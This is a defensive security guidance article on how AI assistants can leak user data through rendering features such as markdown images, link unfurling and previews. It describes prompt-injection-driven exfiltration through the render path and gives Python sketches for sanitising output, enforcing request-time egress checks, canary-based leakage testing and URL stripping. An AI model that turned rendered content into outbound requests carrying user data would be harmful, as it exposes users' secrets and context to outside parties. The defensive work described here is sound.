How should security teams handle AI assistants that can leak user data through rendering features?

Why This Matters for Security Teams

Rendering features are not cosmetic when an AI assistant can convert content into links, markdown, previews, or embedded requests. That makes the render path an outbound data channel, which can expose user input, session context, or hidden instructions to places the user never intended. This is the same class of problem NHIMG has repeatedly highlighted in non-human identity incidents and secret sprawl: exposure often comes from secondary paths, not the obvious one. The Guide to the Secret Sprawl Challenge is useful here because it shows how data leaks become harder to contain once content is copied, transformed, or redistributed across systems. External guidance is also catching up to this risk, including Anthropic on AI-orchestrated cyber operations, which reinforces how quickly seemingly routine tool use can become a security event.

For security teams, the key mistake is assuming the assistant only needs prompt filtering. If the model can render content that fetches remote assets, expands links, or previews user-provided material, it can leak identifiers, tokens, or sensitive business context through the UI layer itself. In practice, many security teams discover this only after a rendered snippet has already exfiltrated data through a preview, webhook, or link expansion path, not because deliberate testing caught it first.

How It Works in Practice

The safest operating model is to treat rendering as a controlled egress function. Every feature that turns text into something executable or retrievable should be mapped, reviewed, and restricted before deployment. That includes markdown rendering, inline image resolution, link unfurling, file previews, and any client-side component that can make a network call. The AI assistant should not be allowed to “helpfully” transform user input into an outbound request without policy checks at the moment of action.

Current guidance suggests three control layers:

Sanitise output before render so user-controlled content cannot create active content, hidden links, or unexpected fetches.

Restrict outbound requests from previews and renders to allowlisted domains and minimal metadata.

Log and review render events separately from chat transcripts so security teams can detect data movement through the UI path.
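The three layers above can be sketched together in a few lines of Python. This is a minimal illustration under stated assumptions, not a production sanitiser: the allowlist contents, the `render_events` logger name, and the function names are all hypothetical, and the regular expression only covers inline markdown links and images (not raw HTML, reference-style links, or autolinks), which a vetted sanitising library would need to handle.

```python
import logging
import re
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would load this from policy.
ALLOWED_HOSTS = {"docs.example.com", "cdn.example.com"}

# Dedicated logger so render events can be routed separately from chat transcripts.
render_log = logging.getLogger("render_events")

# Inline markdown images and links: ![alt](url) or [text](url "title")
MD_LINK = re.compile(r"(!?)\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def _host(url):
    """Return the lowercased hostname, or None if the URL cannot be parsed."""
    try:
        return urlsplit(url).hostname
    except ValueError:
        return None


def host_allowed(url):
    """Layer 2: only https URLs on allowlisted hosts may be fetched."""
    try:
        scheme = urlsplit(url).scheme
    except ValueError:
        return False
    return scheme == "https" and _host(url) in ALLOWED_HOSTS


def sanitise_for_render(text, session_id):
    """Layer 1: neutralise links and images that would trigger unapproved fetches."""

    def replace(match):
        is_image, label, url = match.group(1), match.group(2), match.group(3)
        allowed = host_allowed(url)
        # Layer 3: log the decision with the host only, never the full URL,
        # so the log itself does not store exfiltrated query data.
        render_log.info(
            "session=%s kind=%s host=%s allowed=%s",
            session_id, "image" if is_image else "link", _host(url), allowed,
        )
        if allowed:
            return match.group(0)
        return label or "[blocked]"  # keep the visible text, drop the URL

    return MD_LINK.sub(replace, text)
```

For example, `sanitise_for_render("![x](https://evil.test/p.png?d=secret)", "s1")` reduces the image to its alt text, while a link to `docs.example.com` passes through unchanged.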

For NHI governance, this is a workload identity problem as much as a UI problem. An assistant that can render content should be constrained by the same least-privilege expectations used for other NHI security practices. In environments with autonomous tool use, security teams should prefer policy enforcement at request time over static rules, because the assistant’s behaviour can change with prompt context, retrieved data, or chained actions. The most defensible pattern is to combine content controls with explicit approval for any render path that could expose secrets, user data, or internal links, aligned with the lessons in The 52 NHI Breaches Report and the broader risk patterns in NHI incidents. These controls tend to break down when rendering is handled by third-party plugins or browser-side widgets because the assistant loses direct visibility into what the render engine actually fetches.
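One way to picture request-time enforcement is a small decision function evaluated for every render action, using the context available at that moment. The sketch below is illustrative only: the `RenderRequest` fields, the `TRUSTED_HOSTS` set, and the three-way decision are assumptions introduced here, not part of any named framework or product.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Optional


class Decision(Enum):
    ALLOW = "allow"
    DENY = "deny"
    NEEDS_APPROVAL = "needs_approval"


@dataclass(frozen=True)
class RenderRequest:
    kind: str                         # e.g. "markdown", "image", "link_preview"
    target_host: Optional[str]        # host the render would contact, if any
    context_has_sensitive_data: bool  # secrets, user data, or internal links in scope
    handled_by_third_party: bool      # plugin or browser-side widget does the fetch


# Hypothetical set of hosts the render path may contact.
TRUSTED_HOSTS = frozenset({"cdn.example.com"})


def decide(req):
    """Evaluate one render action at the moment it is requested."""
    if req.target_host is None:
        return Decision.ALLOW           # purely local render, no egress
    if req.target_host not in TRUSTED_HOSTS:
        return Decision.DENY            # unapproved egress destination
    if req.context_has_sensitive_data or req.handled_by_third_party:
        # Trusted host, but the session holds sensitive material or the fetch
        # happens where the assistant has no visibility: ask for approval.
        return Decision.NEEDS_APPROVAL
    return Decision.ALLOW
```

Because the decision takes the current session context as input, the same render action can be allowed in one turn and escalated in the next, which is the property static rules lack.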

Common Variations and Edge Cases

Tighter rendering controls often increase friction for product teams, requiring organisations to balance user experience against the risk of silent data disclosure. That tradeoff is especially sharp in assistants that support rich previews, code blocks, embedded media, or multi-turn collaboration, where users expect the interface to “do more” with the content they provide.

There is no universal standard for this yet, but current guidance suggests treating the highest-risk cases differently:

Markdown and HTML rendering should default to a safe subset, with scripts, remote embeds, and auto-expanding links disabled.

Image and document previews should be isolated from production credentials and blocked from fetching untrusted remote resources.

Any assistant that can summarise or transform sensitive content should be tested for prompt injection plus render-layer leakage, not just model output quality.
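Render-layer leakage testing can be approached with a canary: plant a unique marker in the sensitive context, run the injection scenario, and check whether any URL in the assistant's output carries that marker. The helper below is a rough sketch with hypothetical names; it only detects a canary that appears verbatim, percent-encoded, hex-encoded, or base64-encoded on its own, so a canary embedded inside a larger encoded payload would be missed.

```python
import base64
import re
from urllib.parse import unquote

# URLs as they typically appear in markdown or plain text output.
URL_PATTERN = re.compile(r"https?://[^\s)\"'<>]+")


def canary_variants(canary):
    """Common encodings an injected prompt might use to smuggle the canary."""
    raw = canary.encode()
    return {
        canary,
        base64.b64encode(raw).decode().rstrip("="),
        base64.urlsafe_b64encode(raw).decode().rstrip("="),
        raw.hex(),
    }


def leaking_urls(model_output, canary):
    """Return every URL in the output that carries the canary in some form."""
    variants = canary_variants(canary)
    hits = []
    for url in URL_PATTERN.findall(model_output):
        decoded = unquote(url)  # also catch percent-encoded copies
        if any(v in url or v in decoded for v in variants):
            hits.append(url)
    return hits
```

A test harness would assert that `leaking_urls(output, canary)` is empty for every injection case, treating any hit as a render-path finding rather than a model-quality issue.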

Teams should also watch for indirect leakage through “helpful” enrichment features such as link previews, citation cards, and source extraction. Those features can unintentionally surface query terms, document names, or internal hostnames that were never meant to leave the session. Where the assistant interacts with external content, the risk profile starts to resemble the secret-sprawl and visibility gaps documented in the State of Secrets in AppSec research. Best practice is evolving, but the practical rule is simple: if rendering can initiate network activity, it must be governed like an outbound integration, not treated as a harmless presentation layer.
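As a small illustration of governing enrichment features like an outbound integration, a preview fetcher can be handed a reduced URL rather than the one the assistant produced. The function name and allowlist parameter below are hypothetical, and this is only a sketch: it drops credentials, port, query string, and fragment, but the path can still carry data and may need its own review.

```python
from urllib.parse import urlsplit, urlunsplit


def minimal_preview_url(url, allowed_hosts):
    """Return a stripped-down URL safe to hand to a preview fetcher, or None."""
    try:
        parts = urlsplit(url)
        host = parts.hostname  # lowercased, without userinfo or port
    except ValueError:
        return None  # unparseable input is never fetched
    if parts.scheme != "https" or host not in allowed_hosts:
        return None
    # Rebuild from the bare host and path only: query terms, fragments,
    # and embedded credentials never leave the session.
    return urlunsplit(("https", host, parts.path, "", ""))
```

For instance, a link carrying `?q=...` search terms and embedded credentials is reduced to scheme, host, and path before any preview request is made, and a link to a host outside the allowlist produces no request at all.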

Standards & Framework Alignment

This section maps relevant standards and security frameworks to the operational risks and controls described in this guidance.

OWASP Agentic AI Top 10 and CSA MAESTRO address the attack and risk surface, while NIST AI RMF sets the governance and control requirements practitioners need to meet.

Framework	Control / Reference	Relevance
OWASP Agentic AI Top 10	N/A	Rendering paths can become agentic exfiltration channels.
CSA MAESTRO	N/A	Covers governance for autonomous tool use and data leakage paths.
NIST AI RMF		Risk management must include AI-driven data disclosure through rendering.

Constrain assistant render and tool actions with request-time checks and safe output handling.

